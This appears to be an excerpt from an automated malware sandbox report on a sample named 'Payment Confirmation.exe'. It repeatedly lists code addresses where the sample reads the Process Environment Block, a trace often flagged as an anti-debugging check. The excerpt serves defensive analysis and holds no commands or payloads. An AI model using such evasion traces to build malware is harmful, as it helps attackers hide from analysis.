                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A08402 mov eax, dword ptr fs:[00000030h]7_2_01A08402
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A08402 mov eax, dword ptr fs:[00000030h]7_2_01A08402
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A08402 mov eax, dword ptr fs:[00000030h]7_2_01A08402
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC427 mov eax, dword ptr fs:[00000030h]7_2_019CC427
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE420 mov eax, dword ptr fs:[00000030h]7_2_019CE420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE420 mov eax, dword ptr fs:[00000030h]7_2_019CE420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE420 mov eax, dword ptr fs:[00000030h]7_2_019CE420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C645D mov eax, dword ptr fs:[00000030h]7_2_019C645D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F245A mov eax, dword ptr fs:[00000030h]7_2_019F245A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5C460 mov ecx, dword ptr fs:[00000030h]7_2_01A5C460
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]7_2_01A0E443
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]7_2_01A0E443
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]7_2_01A0E443
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]7_2_01A0E443
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]7_2_01A0E443
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]7_2_01A0E443
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]7_2_01A0E443
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E443 mov eax, dword ptr fs:[00000030h]7_2_01A0E443
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FA470 mov eax, dword ptr fs:[00000030h]7_2_019FA470
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FA470 mov eax, dword ptr fs:[00000030h]7_2_019FA470
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FA470 mov eax, dword ptr fs:[00000030h]7_2_019FA470
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8A456 mov eax, dword ptr fs:[00000030h]7_2_01A8A456
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A847A0 mov eax, dword ptr fs:[00000030h]7_2_01A847A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7678E mov eax, dword ptr fs:[00000030h]7_2_01A7678E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D07AF mov eax, dword ptr fs:[00000030h]7_2_019D07AF
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5E7E1 mov eax, dword ptr fs:[00000030h]7_2_01A5E7E1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DC7C0 mov eax, dword ptr fs:[00000030h]7_2_019DC7C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A507C3 mov eax, dword ptr fs:[00000030h]7_2_01A507C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D47FB mov eax, dword ptr fs:[00000030h]7_2_019D47FB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D47FB mov eax, dword ptr fs:[00000030h]7_2_019D47FB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F27ED mov eax, dword ptr fs:[00000030h]7_2_019F27ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F27ED mov eax, dword ptr fs:[00000030h]7_2_019F27ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F27ED mov eax, dword ptr fs:[00000030h]7_2_019F27ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C720 mov eax, dword ptr fs:[00000030h]7_2_01A0C720
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C720 mov eax, dword ptr fs:[00000030h]7_2_01A0C720
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0710 mov eax, dword ptr fs:[00000030h]7_2_019D0710
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4C730 mov eax, dword ptr fs:[00000030h]7_2_01A4C730
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0273C mov eax, dword ptr fs:[00000030h]7_2_01A0273C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0273C mov ecx, dword ptr fs:[00000030h]7_2_01A0273C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0273C mov eax, dword ptr fs:[00000030h]7_2_01A0273C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C700 mov eax, dword ptr fs:[00000030h]7_2_01A0C700
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A00710 mov eax, dword ptr fs:[00000030h]7_2_01A00710
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0750 mov eax, dword ptr fs:[00000030h]7_2_019D0750
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0674D mov esi, dword ptr fs:[00000030h]7_2_01A0674D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0674D mov eax, dword ptr fs:[00000030h]7_2_01A0674D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0674D mov eax, dword ptr fs:[00000030h]7_2_01A0674D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8770 mov eax, dword ptr fs:[00000030h]7_2_019D8770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0770 mov eax, dword ptr fs:[00000030h]7_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A54755 mov eax, dword ptr fs:[00000030h]7_2_01A54755
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12750 mov eax, dword ptr fs:[00000030h]7_2_01A12750
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12750 mov eax, dword ptr fs:[00000030h]7_2_01A12750
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5E75D mov eax, dword ptr fs:[00000030h]7_2_01A5E75D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C6A6 mov eax, dword ptr fs:[00000030h]7_2_01A0C6A6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4690 mov eax, dword ptr fs:[00000030h]7_2_019D4690
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4690 mov eax, dword ptr fs:[00000030h]7_2_019D4690
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A066B0 mov eax, dword ptr fs:[00000030h]7_2_01A066B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A506F1 mov eax, dword ptr fs:[00000030h]7_2_01A506F1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A506F1 mov eax, dword ptr fs:[00000030h]7_2_01A506F1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01A4E6F2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01A4E6F2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01A4E6F2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01A4E6F2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A6C7 mov ebx, dword ptr fs:[00000030h]7_2_01A0A6C7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A6C7 mov eax, dword ptr fs:[00000030h]7_2_01A0A6C7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A06620 mov eax, dword ptr fs:[00000030h]7_2_01A06620
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A08620 mov eax, dword ptr fs:[00000030h]7_2_01A08620
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E260B mov eax, dword ptr fs:[00000030h]7_2_019E260B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E260B mov eax, dword ptr fs:[00000030h]7_2_019E260B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E260B mov eax, dword ptr fs:[00000030h]7_2_019E260B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E260B mov eax, dword ptr fs:[00000030h]7_2_019E260B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E260B mov eax, dword ptr fs:[00000030h]7_2_019E260B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E260B mov eax, dword ptr fs:[00000030h]7_2_019E260B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E260B mov eax, dword ptr fs:[00000030h]7_2_019E260B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E609 mov eax, dword ptr fs:[00000030h]7_2_01A4E609
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D262C mov eax, dword ptr fs:[00000030h]7_2_019D262C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12619 mov eax, dword ptr fs:[00000030h]7_2_01A12619
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE627 mov eax, dword ptr fs:[00000030h]7_2_019EE627
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A660 mov eax, dword ptr fs:[00000030h]7_2_01A0A660
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A660 mov eax, dword ptr fs:[00000030h]7_2_01A0A660
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9866E mov eax, dword ptr fs:[00000030h]7_2_01A9866E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9866E mov eax, dword ptr fs:[00000030h]7_2_01A9866E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A02674 mov eax, dword ptr fs:[00000030h]7_2_01A02674
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EC640 mov eax, dword ptr fs:[00000030h]7_2_019EC640
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A589B3 mov esi, dword ptr fs:[00000030h]7_2_01A589B3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A589B3 mov eax, dword ptr fs:[00000030h]7_2_01A589B3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A589B3 mov eax, dword ptr fs:[00000030h]7_2_01A589B3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D09AD mov eax, dword ptr fs:[00000030h]7_2_019D09AD
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D09AD mov eax, dword ptr fs:[00000030h]7_2_019D09AD
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A0 mov eax, dword ptr fs:[00000030h]7_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5E9E0 mov eax, dword ptr fs:[00000030h]7_2_01A5E9E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA9D0 mov eax, dword ptr fs:[00000030h]7_2_019DA9D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA9D0 mov eax, dword ptr fs:[00000030h]7_2_019DA9D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA9D0 mov eax, dword ptr fs:[00000030h]7_2_019DA9D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA9D0 mov eax, dword ptr fs:[00000030h]7_2_019DA9D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA9D0 mov eax, dword ptr fs:[00000030h]7_2_019DA9D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA9D0 mov eax, dword ptr fs:[00000030h]7_2_019DA9D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A029F9 mov eax, dword ptr fs:[00000030h]7_2_01A029F9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A029F9 mov eax, dword ptr fs:[00000030h]7_2_01A029F9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A669C0 mov eax, dword ptr fs:[00000030h]7_2_01A669C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A049D0 mov eax, dword ptr fs:[00000030h]7_2_01A049D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9A9D3 mov eax, dword ptr fs:[00000030h]7_2_01A9A9D3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8918 mov eax, dword ptr fs:[00000030h]7_2_019C8918
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8918 mov eax, dword ptr fs:[00000030h]7_2_019C8918
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A6892B mov eax, dword ptr fs:[00000030h]7_2_01A6892B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5892A mov eax, dword ptr fs:[00000030h]7_2_01A5892A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E908 mov eax, dword ptr fs:[00000030h]7_2_01A4E908
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4E908 mov eax, dword ptr fs:[00000030h]7_2_01A4E908
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5C912 mov eax, dword ptr fs:[00000030h]7_2_01A5C912
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A1096E mov eax, dword ptr fs:[00000030h]7_2_01A1096E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A1096E mov edx, dword ptr fs:[00000030h]7_2_01A1096E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A1096E mov eax, dword ptr fs:[00000030h]7_2_01A1096E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5C97C mov eax, dword ptr fs:[00000030h]7_2_01A5C97C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A74978 mov eax, dword ptr fs:[00000030h]7_2_01A74978
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A74978 mov eax, dword ptr fs:[00000030h]7_2_01A74978
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A50946 mov eax, dword ptr fs:[00000030h]7_2_01A50946
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4940 mov eax, dword ptr fs:[00000030h]7_2_01AA4940
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F6962 mov eax, dword ptr fs:[00000030h]7_2_019F6962
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F6962 mov eax, dword ptr fs:[00000030h]7_2_019F6962
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F6962 mov eax, dword ptr fs:[00000030h]7_2_019F6962
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0887 mov eax, dword ptr fs:[00000030h]7_2_019D0887
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5C89D mov eax, dword ptr fs:[00000030h]7_2_01A5C89D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9A8E4 mov eax, dword ptr fs:[00000030h]7_2_01A9A8E4
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C8F9 mov eax, dword ptr fs:[00000030h]7_2_01A0C8F9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0C8F9 mov eax, dword ptr fs:[00000030h]7_2_01A0C8F9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FE8C0 mov eax, dword ptr fs:[00000030h]7_2_019FE8C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA08C0 mov eax, dword ptr fs:[00000030h]7_2_01AA08C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0A830 mov eax, dword ptr fs:[00000030h]7_2_01A0A830
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7483A mov eax, dword ptr fs:[00000030h]7_2_01A7483A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7483A mov eax, dword ptr fs:[00000030h]7_2_01A7483A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F2835 mov eax, dword ptr fs:[00000030h]7_2_019F2835
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F2835 mov eax, dword ptr fs:[00000030h]7_2_019F2835
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F2835 mov eax, dword ptr fs:[00000030h]7_2_019F2835
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F2835 mov ecx, dword ptr fs:[00000030h]7_2_019F2835
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F2835 mov eax, dword ptr fs:[00000030h]7_2_019F2835
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F2835 mov eax, dword ptr fs:[00000030h]7_2_019F2835
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5C810 mov eax, dword ptr fs:[00000030h]7_2_01A5C810
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4859 mov eax, dword ptr fs:[00000030h]7_2_019D4859
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D4859 mov eax, dword ptr fs:[00000030h]7_2_019D4859
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A66870 mov eax, dword ptr fs:[00000030h]7_2_01A66870
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A66870 mov eax, dword ptr fs:[00000030h]7_2_01A66870
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5E872 mov eax, dword ptr fs:[00000030h]7_2_01A5E872
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5E872 mov eax, dword ptr fs:[00000030h]7_2_01A5E872
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E2840 mov ecx, dword ptr fs:[00000030h]7_2_019E2840
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A00854 mov eax, dword ptr fs:[00000030h]7_2_01A00854
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A84BB0 mov eax, dword ptr fs:[00000030h]7_2_01A84BB0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A84BB0 mov eax, dword ptr fs:[00000030h]7_2_01A84BB0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0BBE mov eax, dword ptr fs:[00000030h]7_2_019E0BBE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0BBE mov eax, dword ptr fs:[00000030h]7_2_019E0BBE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0BCD mov eax, dword ptr fs:[00000030h]7_2_019D0BCD
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0BCD mov eax, dword ptr fs:[00000030h]7_2_019D0BCD
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0BCD mov eax, dword ptr fs:[00000030h]7_2_019D0BCD
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F0BCB mov eax, dword ptr fs:[00000030h]7_2_019F0BCB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F0BCB mov eax, dword ptr fs:[00000030h]7_2_019F0BCB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F0BCB mov eax, dword ptr fs:[00000030h]7_2_019F0BCB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5CBF0 mov eax, dword ptr fs:[00000030h]7_2_01A5CBF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FEBFC mov eax, dword ptr fs:[00000030h]7_2_019FEBFC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8BF0 mov eax, dword ptr fs:[00000030h]7_2_019D8BF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8BF0 mov eax, dword ptr fs:[00000030h]7_2_019D8BF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8BF0 mov eax, dword ptr fs:[00000030h]7_2_019D8BF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7EBD0 mov eax, dword ptr fs:[00000030h]7_2_01A7EBD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A98B28 mov eax, dword ptr fs:[00000030h]7_2_01A98B28
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A98B28 mov eax, dword ptr fs:[00000030h]7_2_01A98B28
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4B00 mov eax, dword ptr fs:[00000030h]7_2_01AA4B00
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]7_2_01A4EB1D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FEB20 mov eax, dword ptr fs:[00000030h]7_2_019FEB20
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FEB20 mov eax, dword ptr fs:[00000030h]7_2_019FEB20
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8B50 mov eax, dword ptr fs:[00000030h]7_2_019C8B50
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CCB7E mov eax, dword ptr fs:[00000030h]7_2_019CCB7E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A84B4B mov eax, dword ptr fs:[00000030h]7_2_01A84B4B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A84B4B mov eax, dword ptr fs:[00000030h]7_2_01A84B4B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A78B42 mov eax, dword ptr fs:[00000030h]7_2_01A78B42
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A66B40 mov eax, dword ptr fs:[00000030h]7_2_01A66B40
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A66B40 mov eax, dword ptr fs:[00000030h]7_2_01A66B40
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9AB40 mov eax, dword ptr fs:[00000030h]7_2_01A9AB40
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7EB50 mov eax, dword ptr fs:[00000030h]7_2_01A7EB50
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA2B57 mov eax, dword ptr fs:[00000030h]7_2_01AA2B57
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA2B57 mov eax, dword ptr fs:[00000030h]7_2_01AA2B57
